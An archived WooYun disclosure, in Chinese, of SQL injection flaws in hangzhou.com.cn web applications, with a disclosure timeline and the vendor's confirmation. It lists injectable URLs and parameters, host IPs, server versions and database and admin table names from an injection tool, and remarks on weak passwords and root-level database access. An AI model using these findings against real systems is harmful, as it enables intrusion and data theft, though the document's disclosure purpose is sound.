乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-10: 细节已通知厂商并且等待厂商处理中 2014-01-15: 厂商已经确认,细节仅向厂商公开 2014-01-25: 细节向核心白帽子及相关领域专家公开 2014-02-04: 细节向普通白帽子公开 2014-02-14: 细节向实习白帽子公开 2014-02-24: 细节向公众公开
................................................
......
post的 url:http://form.hangzhou.com.cn/vote.phpdata:q1664=2373&q1665%5B%5D=2377&q1665%5B%5D=2379&q1665%5B%5D=2380&vt_button=%E6%8F%90%20%E4%BA%A4&vt_btnsumbit=yes&voteid=422&q1665%5B%5D=2378Target: http://form.hangzhou.com.cn/vote.phpHost IP: 122.224.215.10Web Server: Apache/2.2.17 (Unix) PHP/5.2.4Powered-by: PHP/5.2.4DB Server: MySQL error basedResp. Time(avg): 358 msSql Version: 5.1.52-communityCurrent DB: vt_formHost Name: advInstallation dir: /Compile OS: unknown-linux-gnuTable found: hl_adminTable found: hl_categoriesTable found: hl_voteTable found: hl_admintypeTable found: hl_vote_listTable found: hl_vote_nameTable found: hl_vote_valueTable found: hl_vote_optionurl:http://web.hangzhou.com.cn/kanfang/message.phpdata:nickname=88952634&act=add&content=88952634&link_id=995Target: http://web.hangzhou.com.cn/kanfang/message.phpHost IP: 61.164.38.24Web Server: ApachePowered-by: PHP/5.2.17p1DB Server: MySQL error basedResp. Time(avg): 98 msSql Version: 5.5.24Current DB: kanfangHost Name: hzycjyInstallation dir: /usr/local/mysqlCompile OS: LinuxTable found: kf_adminTable found: kf_linkTable found: kf_link_typeTable found: kf_messageTable found: kf_photoTarget: http://web.hangzhou.com.cn/zsjs/2013jk/article.php?nid=110Host IP: 61.164.38.24Web Server: ApachePowered-by: PHP/5.2.17p1DB Server: MySQL >=5Resp. Time(avg): 100 msCurrent User: 2013jkzsjs@localhostSql Version: 5.5.24Current DB: 2013jkzsjsSystem User: 2013jkzsjs@localhostHost Name: hzycjyInstallation dir: /usr/local/mysqlCompile OS: LinuxDB User: '2013jkzsjs'@'localhost'Data Bases: information_schema 2013jkzsjs testables found: hl_admin,hl_admintype,hl_categories,hl_jkzsds2_answer,hl_jkzsds2_diqu,hl_jkzsds2_news,hl_jkzsds2_question,hl_jkzsds2_survey,hl_questionhttp://love.hangzhou.com.cn/Club_hd_hg_Content.aspx?id=88 url:http://yst.hangzhou.com.cn/message.phpdata:nickname=88952634&act=add&content=88952634&question_id=131231132590 可能是注射各个系统都是对外的 后台也是对外的部分的为弱口令部分数据库权限为root 旅游频道可能有注射 重点排查吧
url:http://yst.hangzhou.com.cn/message.phpdata:nickname=88952634&act=add&content=88952634&question_id=131231132590 可能是注射各个系统都是对外的 后台也是对外的部分的为弱口令部分数据库权限为root 旅游频道可能有注射 重点排查吧
.............................
危害等级:中
漏洞Rank:10
确认时间:2014-01-15 14:13
由于开发的疏忽导致此次漏洞的产生,非常感谢您的提醒,希望您继续为我们查漏补缺,再次感谢!!
暂无